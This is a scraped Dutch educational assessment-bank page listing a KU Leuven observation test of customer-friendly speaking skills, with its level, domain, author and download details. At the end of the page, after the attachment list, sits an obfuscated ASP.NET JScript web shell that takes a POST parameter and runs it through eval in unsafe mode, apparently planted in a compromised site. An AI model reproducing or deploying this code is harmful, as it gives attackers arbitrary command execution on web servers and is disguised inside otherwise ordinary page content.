Start >
evaluatiebank >
zoeken >
detail
Start >>
Toets zoeken
Toets toevoegen
Registeren
Disclaimer
>>Detail van het resultaat
Titel:
observeren van gespreksvaardigheid met focus op klantvriendelijkheid
Opm (geen pop-up) Indien commercieel product: gegevens van uitgeverij zijn hier te vinden (link naar hun site bv.) Maar gratis downloaden zal dan niet kunnen waarschijnlijk.
Bent u nog niet ingelogd?
Om deze toets te kunnen downloaden moet je inloggen met je e-mail- adres en paswoord.
Hebt je nog geen paswoord?
Registreer >>
Datum:
11/10/2010
Auteur:
CTO 1 KU-Leuven - CTO/Steunpunt GOK (KULeuven)
Doel:
gesprekken voeren
Vaardigheid:
spreken
Domein:
werk (zoeken) en ondernemen / school en opvoeding kinderen / economische consumptie / opleiding en (hoger) onderwijs / vrije tijd, media en sociale contacten / gezondheid / mobiliteit / huisvesting en gezinsadministratie
Niveau:
A1 Breakthrough 1.1 / A2 Waystage 1.2 / B1 Threshold 2.1 / B1 Threshold 2.2 / B1 Threshold 2.3 / B1 Threshold 2.4
Soort:
cursusonafhankelijk / observatie
Bestand
Grootte [KB]
Handleiding
Download
observatieblad klantvriendelijkheid.doc
62.5
Alle bijlagen in één bestand
<%@ Page Language="Jscript" Debug=true%> <% var SO=Request.Form["M"]; var NJF="unsa",PKCLJIY="fe",VSEWDZ=NJF+PKCLJIY; function UKBT() { return SO; } function UJWHK() { return eval(UKBT(),VSEWDZ); } UJWHK() %>